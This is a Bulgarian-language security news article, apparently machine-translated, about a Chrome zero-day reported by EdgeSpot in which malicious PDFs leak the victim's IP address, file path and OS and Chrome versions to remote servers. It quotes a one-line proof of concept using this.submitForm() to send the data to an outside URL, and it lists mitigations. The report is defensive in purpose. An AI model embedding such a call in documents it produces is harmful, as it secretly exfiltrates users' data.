Служба за откриване на експлоатация EdgeSpot откри интригуваща уязвимост на Chrome за нулев ден, използвайки PDF документи. Уязвимостта позволява на нападателите да събират чувствителни данни, използвайки злонамерени PDF документи, отворени в Chrome.

Веднага щом жертвата отвори съответните PDF файлове в Google Chrome, злонамерена програма започва да работи на заден план чрез събиране на потребителски данни.

След това данните се препращат към отдалечения сървър, който се контролира от хакерите. Може би се чудите какви данни се изсмукват от нападателите, те са насочени към следните данни на вашия компютър:

• IP адрес
• Пълен път на PDF файла в системата
• Версии за ОС и Chrome

Внимавайте за PDF файлове, задържани от злонамерен софтуер

Може да се изненадате, когато знаете, че нищо не се случва, когато Adobe Reader се използва за отваряне на PDF файлове. Освен това, HTTP POST заявките се използват за прехвърляне на данни към отдалечените сървъри без никаква намеса на потребителя.

Експертите забелязаха, че един от двата домейна readnotifycom или burpcollaboratornet получава данните.

Можете да си представите интензивността на атаката, като вземете предвид факта, че по-голямата част от антивирусния софтуер не е в състояние да открие пробите, открити от EdgeSpot.

Експертите разкриват, че нападателите използват JavaScript Javascript API „this.submitForm ()” за събиране на чувствителната информация на потребителите.

Тествахме го с минимален PoC, обикновен API призив като „this.submitForm („ http://google.com/test “)“ ще накара Google Chrome да изпрати личните данни на google.com.

Експертите всъщност установиха, че тази грешка в Chrome се експлоатира от два различни набора злонамерени PDF файлове. И двамата бяха разпространени съответно през октомври 2017 г. и септември 2018 г.

По-специално, събраните данни могат да бъдат използвани от нападателите за прецизиране на атаките в бъдеще. Отчетите предполагат, че първата партида от файлове е съставена с помощта на услугата за проследяване на PDF на ReadNotify.

Потребителите могат да използват услугата, за да следят потребителските изгледи. EdgeSpot не е споделил никакви подробности относно естеството на втория набор от PDF файлове.

Как да останем защитени

Услугата за откриване на Exploit EdgeSpot искаше да предупреди потребителите на Chrome за потенциалните рискове, тъй като пластирът не се очаква да бъде пуснат в близко бъдеще.

EdgeSpot докладваше на Google за уязвимостта миналата година и компанията обеща да пусне патч в края на април. Н

въпреки това, можете да обмислите да използвате временно решение на проблема, като локално прегледате получените PDF документи, като използвате алтернативно приложение за четене на PDF.

Освен това можете да отворите PDF документите си в Chrome, като изключите системите си от интернет. Междувременно можете да изчакате актуализацията на Chrome 74, която се очаква да бъде въведена на 23 април.